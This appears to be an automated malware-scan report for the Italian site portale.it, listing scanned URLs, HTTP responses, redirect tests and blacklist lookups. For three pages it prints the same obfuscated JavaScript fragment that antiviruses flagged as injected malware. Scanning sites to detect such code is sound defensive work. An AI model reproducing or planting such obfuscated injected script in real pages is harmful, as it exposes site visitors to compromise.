Scanned pages/files
Request | Server response | Status |
http://www.portale.it/ | 200 OK Content-Length: 25580 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU Antivirus reports:
| ||
http://www.portale.it/js/html5.js | 200 OK Content-Length: 283 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3799 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js | 200 OK Content-Length: 183557 Content-Type: text/javascript | clean |
http://www.al-habib.info/ical-js/jsphp.php | 200 OK Content-Length: 47 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.portale.it/index.php | 200 OK Content-Length: 25580 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU Antivirus reports:
| ||
http://www.portale.it/economia.php | 200 OK Content-Length: 26268 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0OI='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADbshCZslGaDRmblBHch5yTP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLy9GdhN2c1ZmYvxWb0hmLpBXYv8iOwRHdodCI9AyYyNnLwwGbKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgADbsBichZ3OnU0MlQHcpJ3Yz9yQzUSQwUiQzUSOyUCOyUyckFEajRXZGVGbn92bn9VQHFEMlU0MlcjMlQHcpJ3YzFmdhp2L0hXZ0djMlQ0MlU Antivirus reports:
| ||
http://startbyzero.com/static/finance/stock/widget.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://startbyzero.com/test404page.js | 500 Can't connect to startbyzero.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://www.oil-price.net/syndicate_usd.php?lang=it | 200 OK Content-Length: 2713 Content-Type: text/html | clean |
http://www.oil-price.net/\"http://www.oil-price.net/dashboard.php?lang=it | 404 Not Found Content-Length: 327 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: portale.it
Result:
GET / HTTP/1.1
Host: portale.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: portale.it
Referer: http://www.google.com/search?q=portale.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: portale.it
Referer: http://www.google.com/search?q=portale.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=portale.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://portale.it/
Result: portale.it is not infected or malware details are not published yet.
Result: portale.it is not infected or malware details are not published yet.